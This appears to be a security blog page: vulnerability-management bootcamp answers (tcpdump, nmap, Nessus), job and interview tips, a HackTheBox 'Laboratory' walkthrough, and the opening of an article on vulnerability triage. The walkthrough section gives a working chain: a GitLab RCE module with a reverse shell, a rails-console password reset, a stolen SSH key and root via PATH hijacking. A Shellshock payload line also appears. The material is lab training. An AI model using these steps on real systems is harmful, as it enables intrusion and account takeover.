13:55.431127 IP 172.16.84.2.43253 > 172.16.84.3.33438: UDP, length 32
13:55.431181 IP 172.16.84.2.39702 > 172.16.84.3.33439: UDP, length 32
13:55.431235 IP 172.16.84.2.49692 > 172.16.84.3.33440: UDP, length 32
13:55.431288 IP 172.16.84.2.48673 > 172.16.84.3.33441: UDP, length 32
13:55.431342 IP 172.16.84.2.37153 > 172.16.84.3.33442: UDP, length 32
13:55.431398 IP 172.16.84.2.47292 > 172.16.84.3.33443: UDP, length 32
13:55.431451 IP 172.16.84.2.55651 > 172.16.84.3.33444: UDP, length 32
13:55.431505 IP 172.16.84.2.34029 > 172.16.84.3.33445: UDP, length 32
13:55.431558 IP 172.16.84.2.57045 > 172.16.84.3.33446: UDP, length 32
13:55.431611 IP 172.16.84.2.40330 > 172.16.84.3.33447: UDP, length 32
13:55.431664 IP 172.16.84.2.34592 > 172.16.84.3.33448: UDP, length 32
13:55.431738 IP 172.16.84.2.50855 > 172.16.84.3.33449: UDP, length 32
13:55.433781 IP 172.16.84.3 > 172.16.84.2: ICMP 172.16.84.3 udp port 33437 unreachable, length 68
13:55.435107 IP 172.16.84.3 > 172.16.84.2: ICMP 172.16.84.3 udp port 33438 unreachable, length 68
13:55.435107 IP 172.16.84.3 > 172.16.84.2: ICMP 172.16.84.3 udp port 33439 unreachable, length 68

Back to Question

Answer 1.2

Another trick question! ping uses a layer 3 protocol “ICMP” which is neither TCP nor UDP (which are layer 4 protocols) and does not use ports. This can be seen by running a tcpdump capture at the same time as the ping and seeing no ports included. The tcpdump capture shown below shows no ports after the IP addresses.

listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
11:21:07.451104 IP 172.16.84.2 > 172.16.84.3: ICMP echo request, id 50276, seq 1, length 64
11:21:07.451781 IP 172.16.84.3 > 172.16.84.2: ICMP echo reply, id 50276, seq 1, length 64

Back to Question

Answer 1.3

The “-2” crafts a UDP datagram and the “-p 69” will send it to port 69.

hping3 -2 -p 69 METASPLOITABLE_IP -c 1

As you can see in the tcpdump output shown below, nothing is returned from the Metasploitable box.

listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
11:30:24.006909 IP 172.16.84.2.2758 > 172.16.84.3.tftp: TFTP, length 0 [|tftp]
^C
1 packet captured
1 packet received by filter
0 packets dropped by kernel

Nothing is returned because UDP is connectionless and therefore will not return responses for UDP services that are listening and receive data.

Back to Question

Answer 1.4

The TTL of the first packet sent is 1. Determine this by running the tcpdump packet capture shown below while executing the traceroute. In this ouput you can see it says “…ttl 1…” If you’d like to understand why the TTL is set this way, I recommend researching host traceroute works.

sudo tcpdump -i eth0 -v
tcpdump: listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
11:33:05.006272 IP (tos 0x0, ttl 1, id 19407, offset 0, flags [none], proto UDP (17), length 60)

Further down in the packet capture, you will see a record with the same “id” as that first UDP packet described above. This is the ICMP packet returned from the “next-hop” router which is in fact your VMware bridge router.

172.16.84.1 > 172.16.84.2: ICMP time exceeded in-transit, length 36
        IP (tos 0x0, ttl 1, id 19407, offset 0, flags [none], proto UDP (17), length 60)

Back to Question

Answer 1.5

By default, Nmap only scans the top 1000 ports (this list is available on your Kali box at /usr/share/nmap/nmap-services). You can scan all ports using the command below. Essentially, you are just specifying all ports (using “-p0-65535”) in the command.

nmap -p0-65535 METASPLOITABLE_IP

Back to Question

Exercise 2 Answers

Answer 2.1

TCP, ARP, ICMP. This is determined by going to the “DISCOVERY” section within the “Settings” tab of the host discovery scan creation wizard. Within this pane you will see TCP, ARP and ICMP listed under “Ping hosts using:”

Back to Question

Answer 2.2

“Nessus Scan Information”, plugin 19506 and “Ping the remote host”, plugin 10180.

Back to Question

Answer 2.3

In the output of the 19506 plugin, there is a line which reads “Credentialed checks : no”.

Back to Question

Answer 2.4

Though it may vary, the likely answer is ARP. The successful method can be determined by reviewing the 10180 plugin’s output as shown below.

The remote host is up
The host replied to an ARP who-is query.
Hardware address : 00:0c:29:4b:79:e4

Back to Question

Exercise 3 Answers

Answer 3.1

Nessus uses a 5-tier severity scale - Critical, High, Medium, Low, Informational. Tenable has also recently introduced a new risk-scoring methodology known as VPR.

Back to Question

Answer 3.2

By opening up the uncredentialed scan results and clicking on the “VPR Top Threats” tab, you will see just one Critical vulnerability, “Apache Tomcat AJP Connector Request Injection (Ghostcat)” with a VPR score of 9.6. It’s been given this rating despite it’s CVSSv3 Impact Score being only a 5.9. This is due to the readily available exploit code and high Threat Intensity.

Back to Question

Answer 3.3

By opening up the credentialed scan results and clicking on the “VPR Top Threats” tab, you will see several Critical severity issues. The top issue is “Bash Remote Code Execution”, with a VPR severity score of 9.8. This is scored higher than the previously identified hihg-risk issue in the uncredentialed scan due to its Threat Intensity being “Very High” as opposed to just “High”. This intensity is calculated based on the number and frequency of recently observed threat events (by Tenable themselves presumably).

Back to Question

Answer 3.4

There are quite a few different ways to troubleshoot/validate credentialed scans. A few such options include the following plugins…

Plugin 19506 can be used by looking at the plugin output - specifically where it says “Credentialed checks : yes, as ‘msfadmin’ via ssh”.
The presence of plugin 117887, “Local Checks Enabled” is a good sign that the scan was successful in logging in and performing local checks.
Plugin 141118, “Target Credential Status by Authentication Protocol - Valid Credentials Provided” very explicitly claims that “valid credentials” have been provided. This would be another sure-fire way to claim that the scan was successfully performed with credentials.

Back to Question

Answer 3.5

The scan was performed with the credentials msfadmin / msfadmin. Though these are valid credentials for the Metasploitable system, the user msfadmin does not sufficient privileges on the system for all of Nessus’ checks. In fact, plugin 110385, “Target Credential Issues by Authentication Protocol - Insufficient Privilege” tells us this exact thing.

Back to Question

Exercise 4 Answers

Answer 4.1

There is a toggle in the “Advanced” settings within the scan configuration wizard which can “Stop scanning hosts that become unresponsive during scan”. Toggling this on can help with systems that are more sensitive in nature or that are experiencing responsiveness issues.

Back to Question

Answer 4.2

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0). You can find this by going to the scan configuraiton wizard settings, going to “Assessment –> Web Applications”, toggling “Scan web applications” and then looking at the default value in the “Use a customer User-Agent” field.

Back to Question

Answer 4.3

SYN. You can find this by going to the scan configuration wizard settings, going to “Discovery –> Port Scanning”, scrolling down to the “Network Port Scanners” section and then seeing that only the “SYN” check-box is checked (TCP and UDP are not checked by default).

Back to Question

Exercise 5 Answers

Answer 5.1

The CVSS v2.0 Vector for the Shellshock vulnerability is AV:N/AC:L/Au:N/C:C/I:C/A:C. “AC:L” means that the “Access Complexity” for successfully exploiting this vulnerability is Low. In other words, exploiting this issue is trivial, thus its Critical severity rating.

Back to Question

Answer 5.2

In this case, Nessus actually physically exploited the vulnerability. It did so as can be seen in the plugin output below…

Nessus was able to set the TERM environment variable used in an SSH
connection to :

() { :;}; /usr/bin/id > /tmp/nessus.1619029506

Back to Question

Answer 5.3

This is somewhat of a subjective question, but in my mind, the highest risk issue is the “Bind Shell Backdoor Detection” finding. This is not only immediately exploitable but also evidence of previous/current system compromise. In other words, an attacker is likely already on the system! In fact, Nessus was even able to exploit this vulnerability as shown in the output below.

Nessus was able to execute the command "id" using the
following request :

This produced the following truncated output (limited to 10 lines) :
------------------------------ snip ------------------------------
root@metasploitable:/# uid=0(root) gid=0(root) groups=0(root)
root@metasploitable:/#

Back to Question

Answer 5.4

By going to the “Remediations” tab within the credentialed scan results, we can see a list of “Actions”. Each action represents a patch or other mitigation that can be applied and how many vulns that patch will fix. The top “Action” is “Ubuntu 8.04 LTS : linux vulnerabilities (USN-1105-1): Update the affected packages.” which according to Nessus will fix 234 vulnerabilities. Though this may in fact reduce a lot of risk on the system, it still wouldn’t be the highest thing I would prioritize. This is why manual analysis is so important as opposed to relying on what Nessus tells you via it’s automated semi-prioritization methodology.

Back to Question

Exercise 6 Answers

Answer 6.1

A “Filter” can be created in the “Vulnerabilities” tab first. This filter should have the criteria “Severity is equal to Critical”. Once this filter has been applied, any report that is generated will just be for the filtered vulnerabilities.

Back to Question

Answer 6.2

There are a number of different parties that may be interested in receiving different kinds of reports from Nessus. Some of these groups are listed below.

IT Leadership may be interested in a report which has a high level breakdown of how many vulnerabilities are present within the organization’s overall environment.
VM Analysts may be interested in a report that has particularly high-risk vulnerabilities in it.
System Administrators may be interested only in vulnerabilities that affect systems they own. They may also be interested only in vulnerabilities which match particular SLA criteria (meaning which vulnerabilities do they need to address soon.)
IT Managers - May be interested in vulnerabilities which affect all the systems within their department. They may also just be interested in high level number of vulnerabilities.

Back to Question

Scenario-Based Exercises

At this point, you’ve learned the pre-requisite knowledge recommended to succeed in a VM role and you’ve acquired real hands-on experience doing VM tasks with Nessus. This section is the culmination of all the work you’ve put in throughout this bootcamp. Below is a progressive series of six exercises, each mapping to a different stage of the VM lifecycle. They are designed to test your knowledge and evaluate your thought process as it relates to real-world VM scenarios. They are all open-ended such that there are no “answers”, rather they are more abstract thought exercises. I recommend you go through each, writing up a quick paragraph or two on how you would solve each of the prompts. Optionally, I invite you to contact me (or start a discussion on the Discord) with your writeups and we can discuss your answers. At that time, I can give you my opinions and feedback on your answers. Again, there is not necessarily a single right answer to any of these prompts. You are also welcome to contact me if there are any other questions about these scenarios. With all that said, let’s introduce the scenario-based exercises. NOTE: These exercises require that you have completed all the exercises within the bootcamp!

Scenario 1: IDENTIFY

An automated Nessus scan identified the Ghostcat vulnerability (plugin 134862) on a host. An automated report was sent to the system owner detailing the finding. The system owner has contacted the VM team (you) and is claiming the finding is a false-positive. How would you go about addressing this claim?

Scenario 2: CLASSIFY

The CISO has asked the VM team (you) to provide a list of the top 10 highest-risk vulnerabilities present within the organization’s environment. Assume Metasploitable is the entirety of the environment. What would be the top 10 vulnerabilities and how did you come to this determination?

Scenario 3: ANALYZE

Upon receiving the scan report of the Metasploitable system, IT leadership has asked that the VM team (you) put together a risk assessment for the “NFS Exported Share Information Disclosure” (plugin 11356) finding. This finding has been identified on other systems within the network and leadership wants a more thorough understanding of the risk. Create this risk assessment, come up with a final risk determination and think of any additional questions you may need answered to accurately come up with this designation.

Scenario 4: PRIORITIZE

In Scenario 2, we came up with a list of the top 10 highest risk vulnerabilities. We now need to prioritize the remediation of all findings within the Metasploitable scan report. How would you suggest prioritizing these fixes? Would you recommend fixing them in the order you specified earlier? If so or if not, explain why. I would recommend making some assumptions on a few things…

What data is stored/processed by the Metasploitable system (in theory).
What resources are available for patching or implementing other defensive measures?
etc…

Scenario 5: REPORT

Nessus Essentials has limited reporting options. Given you had more flexibility in how you create reports and what content exactly they could contain, in what formats and with what content would you suggest for reports being sent to the following groups…

IT Leadership
Company Executives
IT System Owners
VM Staff

Scenario 6: REMEDIATE/MITIGATE

The Metasploitable system is overrun with vulnerabilities. Swift action must be taken to mitigate risk. What are the first 3 things you would recommend for mitigating this risk? HINT: Think beyond patches and consider alternative approaches to risk mitigation.

How to Find a VM Job

Congrats! Presumably, you are through the bootcamp and are now faced with the challenge of actually finding and applying to relevant positions within VM that you could be qualified for. Below is a quick list of tips for hunting down applicable positions.

Expand. Your. Search. Look and apply everywhere. Linkedin, Monster, SimplyHired, Reddit, Craigslist, Dice, Indeed, Company career pages, Glassdoor, etc… There may be a lot of overlap but widening the set of sources you use is a good start. I’ll also add that volume of applications can be your friend. Yes, it is definitely work, and yes, it is frustrating to be turned down (again and again), but perseverance is key and applying to a lot of places will statistically up the probability you get an opportunity.
Don’t be afraid to apply. What I mean is - yes, you want to avoid applying to places that you are completely unqualified for but don’t be too scared off by job reqs that ask for N years of experience. If it sounds like you can do what is being asked of you in the job req, or you at least have some or most of the qualifications, you need not worry that you don’t check every box.
Don’t embellish or lie on your resume. You don’t need to. This is an entry-level job and they don’t expect you to know everything. If you’ve never used a tool, don’t list it. If you’ve used it once or twice though, put it on your resume! Everything on your resume is fair game and you should be ready to, at a minimum, explain what a tool is, what it does and in what capacity you have used it.
“Vulnerability” is a good search term. A lot of VM jobs (unsurprisingly I guess) have titles which include “Vulnerability” in it in some fashion (e.g. “Senior Engineer, Vulnerability Management”, “Vulnerability Management Analyst”, “Vulnerability Engineer”, “Vulnerability Management Security Engineer - Security Operations”, etc…) There is no standard title for VM, these are job titles I pulled off of a job board today! Play around with these search terms to cast the best possible net.
Not every company has positions that are pure VM. In many cases, VM responsibilities fall within the “SIOC” or engineering teams and as such, these jobs require experience or skills far beyond what is covered in this bootcamp. I would recommend reading the job req and trying to determine what percentage of the daily responsibilities involve VM versus other engineering/SIOC-type-work. You may still be eligible for that position or the hiring manager may be willing to bring you in for your VM experience alone, as long as you are willing to learn the other facets of the role (and you should be eager to learn as much as possible!)

I will add additional tips here as I think of them. Now, let’s talk about the interview…

VM Interview

So you’ve gone through the bootcamp, applied to some VM positions and now have an interview scheduled. Well done! It’s time to put it all together and knock it outta the park. Below, I have a few quick tips on your interview as well as a series of common interview questions (and some possible answers where appropriate).

Interview Tips

Don’t be afraid to admit you don’t know something. If you’re asked a question you don’t know, state that you don’t know or are not sure, but always offer to explain your thought process for answering the question. Interviewers want to know how you think moreso than necessarily if you have the “right” answer. In many cases there may be no right answer, so always offer up your thoughts. Try to keep them brief and to the point though - rambling on when you are very unsure can certainly be a turn-off for an interviewr.
Be enthusiastic. This is true of any interview but particularly potent for entry-level / junior interviews. Those in charge of hiring understand that junior applicants may not have any real experience (you do though!), and it can be really hard to truly gauge someones technical acumen. What’s not hard however, is to see if someone is truly interested in the role and passionate about infosec.
Have plenty of questions. Be ready to ask a lot of questions, this if nothing else will show interest in the role. Some example questions are…
- What tools does the team use?
- What is the makeup of the team now?
- What are the biggest challenges that the team currently faces?
- Where would you like the program to be in 1 year? What about 2 years?
- What does success look like to you for someone coming into this role?
If you don’t know something or are otherwise stumped by a question, always return to being very interested and excited about learning more on that topic. Where it applies, you can even mention things you are learning currently that are related to that topic.
Be ready to explain the things you do at home / in-your-free-time to stay up-to-date on all things infosec. Podcasts, RSS feeds, Reddit, Mastodon, infosec blogs, building a homelab, etc…
Be yourself (within reason).

Interview Questions

Q: What port is HTTPS typically on? · A: 443 but it is also commonly found on port 8443.
Q: What are some vulnerabilities you are familiar with? · A: Reference the Vulnerabilties section for some good ideas.
Q: What is the difference between TCP and UDP? · A: Reference the Networking section for some good ideas. But remember TCP is connection-oriented while UDP is not.
Q: Explain at a high-level how HTTPS works. · A: Check this out and be able to describe HTTPS at a high-level.
Q: How does traceroute work? · A: This guide does a good job explaining the basics.
Q: What are some interesting logs on Linux/Windows and where are they stored? · A: Linux logs and Windows logs.
Q: What are the different types of XSS? · A: Reflected, Stored and DOM-based. Check this guide out.

I’ll add additional tips and interview questions as I think of them. If you have any you think would be good to add, just let me know!

Help & Outro

For any questions, suggestions, feedback, corrections or anything else related to the VM Bootcamp, feel free to contact me anytime. For in-depth discussions on the scenario-based questions or anything else, I encourage you to join the Discord and we can chat!

If you’ve completed the bootcamp in it’s entirety, I’d like to first thank you for reading and I sincerely hope you found the content useful and somewhat mentally stimulating. Second, CONGRATS! - hopefully this can be the first (or at least one) of many steps you will take in a successful infosec career. Feel free to connect with me on Linkedin and if I can, I’ll do what I can to refer you or otherwise help you progress in your career.

HackTheBox: Laboratory

Mon, 19 Apr 2021 01:40:00 -0400

Welcome back to my HackTheBox series! This box was an interesting one, let’s get into it…

Jump to Section

Reconnaissance
Foothold
User
Root

Reconnaissance

First, (per usual) I run Nmap to see what’s listenin’ on the box.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -n -sS 10.10.10.216 -A
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-22 00:08 EST
Nmap scan report for 10.10.10.216
Host is up (0.095s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 25:ba:64:8f:79:9d:5d:95:97:2c:1b:b2:5e:9b:55:0d (RSA)
|   256 28:00:89:05:55:f9:a2:ea:3c:7d:70:ea:4d:ea:60:0f (ECDSA)
|_  256 77:20:ff:e9:46:c0:68:92:1a:0b:21:29:d1:53:aa:87 (ED25519)
80/tcp  open  http     Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
443/tcp open  ssl/http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=laboratory.htb
| Subject Alternative Name: DNS:git.laboratory.htb
| Not valid before: 2020-07-05T10:39:28
|_Not valid after:  2024-03-03T10:39:28
| tls-alpn:
|_  http/1.1

From the output, I can see a DNS entry for git.laboratory.htb. Let’s check that out.

Quickly add this domain to the /etc/hosts file…

sudo vi /etc/hosts
---
127.0.0.1       localhost
127.0.1.1       kali
10.10.10.216    git.laboratory.htb

Now let’s navigate to git.laboratory.htb, register a new user and then login as that user. While we’re here, click on the question mark in the top right and then click the “Help” link. Here we can see a version for GitLab of “12.8.1”. With this information, a quick google search yields an exploit, courtesy of Metasploit.

Foothold

Fire up Metasploit and search for “GitLab”. This produces a RCE module that looks like it should suit our needs.

use exploit/multi/http/gitlab_file_read_rce

Once you’ve loaded up the gitlab_file_read_rce Metasploit module, set the following options…

set USERNAME and PASSWORD to your GitLab credentials you registered earlier
set RHOSTS to the target host (10.10.10.216)
set RPORT to 443 (gitlab is SSL)
set SSL to “yes”
set VHOST to “git.laboratory.htb”
set LHOST to your source host
set LPORT to whatever you like
set payload to generic/shell_reverse_tcp (meterpreter not supported)

These options, set as described, are shown below…

Module options (exploit/multi/http/gitlab_file_read_rce):

   Name             Current Setting                                               Required  Description
   ----             ---------------                                               --------  -----------
   DEPTH            15                                                            yes       Define the max traversal depth
   PASSWORD         mikemike                                                      no        The password for the specified username
   Proxies                                                                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS           10.10.10.216                                                  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT            443                                                           yes       The target port (TCP)
   SECRETS_PATH     /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml  yes       The path to the secrets.yml file
   SECRET_KEY_BASE                                                                no        The known secret_key_base from the secrets.yml - this skips the arbitrary file read if present
   SSL              true                                                          no        Negotiate SSL/TLS for outgoing connections
   TARGETURI        /users/sign_in                                                yes       The path to the vulnerable application
   USERNAME         mike                                                          no        The username to authenticate as
   VHOST            git.laboratory.htb                                            no        HTTP server virtual host


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.17      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Bombs Away! (exploit -j)

msf6 exploit(multi/http/gitlab_file_read_rce) >
[*] Started reverse TCP handler on 10.10.14.17:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. GitLab 12.8.1 is a vulnerable version.
[*] Logged in to user mike
[*] Created project /mike/DaCcZDf0
[*] Created project /mike/b7GzMpia
[*] Created issue /mike/DaCcZDf0/issues/1
[*] Executing arbitrary file load
[+] File saved as: '/home/kali/.msf4/loot/20210122001827_default_10.10.10.216_gitlab.secrets_310794.txt'
[+] Extracted secret_key_base 3231f54b33e0c1ce998113c083528460153b19542a70173b4458a21e845ffa33cc45ca7486fc8ebb6b2727cc02feea4c3adbe2cc7b65003510e4031e164137b3
[*] NOTE: Setting the SECRET_KEY_BASE option with the above value will skip this arbitrary file read
[*] Attempting to delete project /mike/DaCcZDf0
[*] Deleted project /mike/DaCcZDf0
[*] Attempting to delete project /mike/b7GzMpia
[*] Deleted project /mike/b7GzMpia
[*] Command shell session 1 opened (10.10.14.17:4444 -> 10.10.10.216:51282) at 2021-01-22 00:18:31 -0500

Huzzah! A shell. Let’s take a peek inside…

msf6 exploit(multi/http/gitlab_file_read_rce) > sessions -i 1
[*] Starting interaction with 1...

hostname
git.laboratory.htb
whoami
git

User

This is where (imo) it starts to get a little tricky…

First, I’ll upgrade my shell.

python3 -c 'import pty; pty.spawn("/bin/bash")'

Now, let’s take a look at /etc/passwd.

cat /etc/passwd
...
git:x:998:998::/var/opt/gitlab:/bin/sh
gitlab-www:x:999:999::/var/opt/gitlab/nginx:/bin/false
gitlab-redis:x:997:997::/var/opt/gitlab/redis:/bin/false
gitlab-psql:x:996:996::/var/opt/gitlab/postgresql:/bin/sh
mattermost:x:994:994::/var/opt/gitlab/mattermost:/bin/sh
registry:x:993:993::/var/opt/gitlab/registry:/bin/sh
gitlab-prometheus:x:992:992::/var/opt/gitlab/prometheus:/bin/sh
gitlab-consul:x:991:991::/var/opt/gitlab/consul:/bin/sh

From this output, I get the feeling theres some GitLab or container (I see the word “registry”) machinations going on here.

…a bunch of googling later… I find a GitLab-related console I can use to reset a user password. Hopping into said console…

gitlab-rails console -e production

Here I can see a user named “Dexter”. (Dexter’s Laboratory anyone?)

user = User.where(id: 1).first
#<User id:1 @dexter>

Following these password reset instructions…

user.password = 'password'
user.password = 'password'
"password"
user.password_confirmation = 'password'
user.password_confirmation = 'password'
"password"
user.save!
user.save!
Enqueued ActionMailer::DeliveryJob (Job ID: 1c391664-161d-44cf-9477-2e31991979db) to Sidekiq(mailers) with arguments: "DeviseMailer", "password_change", "deliver_now", #<GlobalID:0x00007fbf6a8537a8 @uri=#<URI::GID gid://gitlab/User/1>>
true

I’ve now changed poor Dexter’s password and can return to the GitLab portal and log in as Dexter himself. Once in as Dexter, I navigate to his Projects and check out the “CONFIDENTIAL” repo. Inside this repo, I see a .ssh directory with a private key. Copy these down to your ~/.ssh directory and make sure /etc/hosts has the following entry.

10.10.10.216    laboratory

You can then SSH as dexter.

ssh dexter@laboratory

Root

Now as dexter, I am on the hunt for a root shell. Using my go to linux priv-esc guide, I find a suspicious binary in /usr/local/bin/docker-security. Another, more specific command to find this would be…

find / -perm -4000 2>/dev/null

Ok, so what does docker-security do? Running it has no obvious output. Hmm… It’s definitely an ELF linux binary (try running file)… Let’s try running ltrace and see if that gives us anything…

dexter@laboratory:/usr/local/bin$ ltrace ./docker-security
setuid(0)                                                                                     = -1
setgid(0)                                                                                     = -1
system("chmod 700 /usr/bin/docker"chmod: changing permissions of '/usr/bin/docker': Operation not permitted
 <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                                                                        = 256
system("chmod 660 /var/run/docker.sock"chmod: changing permissions of '/var/run/docker.sock': Operation not permitted
 <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                                                                        = 256
+++ exited (status 0) +++

So it appears the binary is making itself root and then trying to chmod some stuff. It’s chmod can be our chmod though! That makes sense right? If we create our own binary named “chmod”, modify the PATH variable to include the path to our new chmod binary and then run docker-security again, we can then run commands as root! Fun PATH hijacking stuff…

cd /tmp
echo "/bin/bash" > chmod
chmod +x chmod
echo $PATH
export PATH=/tmp:$PATH
/usr/local/bin/docker-security

w00t!

root@laboratory:/usr/local/bin# whoami;id
root
uid=0(root) gid=0(root) groups=0(root),1000(dexter)

SANS SEC588: Cloud Penetration Tester Review

Mon, 19 Apr 2021 01:00:00 -0400

Orchestrating Enterprise Vulnerability Triage

Thu, 01 Apr 2021 15:37:00 -0400

Vulnerability Triage is an essential component of any Vulnerability Management (“VM”) program. I define Vulnerability Triage as the process of identifying disclosed vulnerabilities, mapping the affected products within these vulnerability disclosures to an environment inventory and then ultimately making decisions on how to address these correlated findings through subsequent analysis and prioritization. In other words, as new vulnerabilities are disclosed (i.e. as a CVE through NVD), there is a process to determine if systems in an environment are potentially affected. If so, what is the risk and what should be done about it? A high level depiction of this process is illustrated below. *The “Decision” diamond in this diagram represents how the findings are ultimately processed with respect to escalation, remediation and mitigation.

Every organization that has a VM program (and that really should be every organization) is doing some variation of this process. They may not explicitly call it “Vulnerability Triage”, but they are doing it all the same. In my experience building and running VM programs over the years I have identified a number of commonalities, pitfalls, bottlenecks, high-friction areas and other points of interest related to this process of Vulnerablity Triage. The goal of this article is to describe in detail these findings, and how we can leverage orchestration to perform enterprise-grade vulnerability triage at scale while eliminating some of the common friction points and bottlenecks I have alluded to.

Jump to Section

Vulnerability Management Primer
Vulnerability Triage Deep-Dive
Symphonic Vulnerability Surface Mapping (SVSM)
SVSM Using Vulnscape

A Primer on Vulnerability Management

First, let’s quickly go over the concept of Vulnerability Management (a.k.a. “VM”). VM in a nutshell is the continuous process of identifying, classifying, analyzing, prioritizing, reporting, remediating and mitigating vulnerabilities. VM is ubiquitous in enterprise environments as it is fundamental to understanding (technical) risk across the information systems that comprise an IT organization. Without VM, gaps in protection (vulnerabilities) are not identified or not properly addressed which can lead to very real consequences such as exploitation, system compromise, data loss, compliance/regulatory violations and even full-scale breach of an organizations environment.

In fact, VM is so fundamental it comes in third place (as of version 7.1) in the CIS (Center for Internet Security) top 20 “Critical Security Controls”. These 20 CIS controls collectively represent a prioritized set of actions which have been established as best practices for mitigating a large majority of attacks against systems and networks. In essence, VM is pretty crucial to enterprise security, falling only behind hardware/software inventory with respect to priority. This dependency is further illustrated below.

Before moving on let’s quickly cover the aforementioned inventory prerequisite. CIS Control 1: Hardware Inventory and CIS Control 2: Software Inventory as precursory actions are paramount to achieving effective VM. Essentially, you can’t hope to manage vulnerabilities in an environment whereby you don’t have a complete understanding of all the software and hardware assets in that setting. The common saying being, you can’t protect what you don’t know about.

Vulnerability Triage Deep-Dive

Alright, now that we have a basic understanding of vulnerability triage and how it fits within the overarching Vulnerability Management process, let’s take a closer look at the individual steps for triage. These steps are summarized as well as illustrated in the respective list and diagram below.

Vulnerability Triage Process Steps

Step 0 ( Pre-Triage ): Build/maintain a comprehensive and accurate asset inventory
Step 1: Ingest vulnerability data/intelligence
Step 2: Correlate vulnerability data with asset inventory
Step 3: Leverage metadata from vulnerability/asset data sources to perform risk analysis
Step 4: *Prioritize findings
Step 5 ( Post-Triage ): **Treatment of findings

*More primitive implementations of vulnerability triage may not include the prioritization step. This can be considered an optional advanced element.

**Vulnerability treatment(s) are not considered part of the vulnerability triage process. It is listed merely as a means to show it’s relationship to the other portions of the triage process.

Vulnerability Triage Process Diagram

Vulnerability Triage Levels

The goal of vulnerability triage is to make decisions on how a vulnerability should be treated. Triage can involve a relatively quick analysis of whether a vulnerability is applicable to a specific environment all the way to full in-depth analysis of a particular vulnerability and how it affects specific systems. This scale from simple to thorough can be described using the levels detailed below. Each of the levels below can be considered “vulnerability triage”, just at different depths.

Level 1: Answers the simple question, “Is there any exposure?”. (i.e. are there vulnerabilities that affect products within an environment which do not have patches or controls which mitigate said vulnerability).
Level 2: Does the vulnerability meet any criteria that may result in the vulnerability being particularly high or critical risk? This involves taking a cursory glance at vulnerability and asset metadata.
Level 3: Partial risk analysis. Get a better understanding but not necessarily a full risk determination.
Level 4: Complete risk analysis. Get a complete understanding of risk to the environment.
Level 5: Complete risk analysis and prioritization. Get not only a complete understanding of the risk to the environment but prioritize how that finding will be addressed in the context of other findings.

Now that we have a high level picture of the vulnerability triage process and some of the ways it can be defined, let’s dive a little deeper into each step…

Asset Inventory

Having an accurate, comprehensive, up-to-date inventory of all software and hardware in an environment is one of the most important components of Vulnerability Triage. In the absence of a single-source of record or master inventory, you can leverage multiple disparate sources of inventory. Some examples of asset inventory sources are listed below.

Inventory Sources

IT Asset Management tools (ITAM)
Configuration Management Databases (CMDB)
GRC platforms (e.g. Archer, ServiceNow, Jira SD, etc…)
Application Lifecycle Managment (ALM) tools
Cloud inventory tools (e.g. AWS Systems Manager, AWS Config, etc…)
Other (e.g. IPAM, scanning tools, etc…)

Within these inventory sources, or as part of the master asset inventory, there is certain metadata we are interested in for vulnerability triage. Some examples of information elements of interest are listed below. Ultimately, this data is used to answer two essential questions, what is our high-level exposure? and what is the risk of any specific vulnerability as it applies to an affected system?

Inventory Metadata

Vendor / product / version of software and hardware
Unique system identifier (e.g. IP, hostname, netbios, etc…)
Ownership (e.g. business vertical, technical owner, etc…)
Data classification processed/stored by that system
Externality (e.g. external, internal, cloud, etc…)
Scope of affected systems
System to system relationships/affinities

Having a single master inventory with all of the aforementioned data would certainly make the process of vuln triage much easier. However, this information is not always readily available. In many organizations, there may be reliance on multiple inventory sources that collectively represent the entire environment. Or worse, there may be only a partial inventory or no real inventory at all! With respect to metadata, I suspect it is quite rare to have all the information detailed in the list above. The good news is however, as detailed in the section on triage levels, vulnerability triage does not require everything listed. At a minimum, we need only a decent inventory which includes basic product information ideally mapped to individual asset identifiers. This could at least get us to a level 1 triage. Put differently, if the inventory can tell us that product X exists on systems A, B and C, we are in good shape. With this, you can certainly make basic triage decisions. From there, the more additional information you have, the more detailed your analysis can be (achieving higher level triage) which in turn removes the added overhead required for manual analysis and ultimately yields better prioritization results.

Vulnerability Intelligence

Alright! Once we have a solid asset inventory, we now need to collect information on known/disclosed vulnerabilities. I refer to this process of collecting vulnerability data and parsing the relevant metadata as Vulnerability Intelligence. There is a plethora of vulnerability data sources both open-source/free as-well-as commercial we can leverage. From these vulnerability sources, we need to collect certain bits of metadata which help with vuln-to-product correlation as well as risk analysis. Below, I list a number of potential vulnerability data sources as well as some examples of important vulnerability metadata.

Sources

Vulnerability feeds (e.g. NVD, MITRE, Security Tracker, etc…)
VM vendor feeds (e.g. Qualys, Tenable, Rapid7)
Security bulletins (e.g. CISA, AWS, Android, Microsoft, Oracle, etc…)
Exploit databases (e.g. exploit-db, vuldb, SecurityFocus, packet storm, vulners, etc…)
Social media (e.g. Twitter, etc…)
RSS (e.g. Feedly, curated research sources, etc…)
*Threat Intelligence sources
Consider support for the Common Security Advisory Framework (CSAF).
and more…

